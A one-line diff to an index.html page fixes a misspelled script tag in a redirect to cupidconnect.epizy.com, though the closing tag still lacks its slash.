--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script>window.location.href="http://cupidconnect.epizy.com"<sctipt>
+<script>window.location.href="http://cupidconnect.epizy.com"<script>
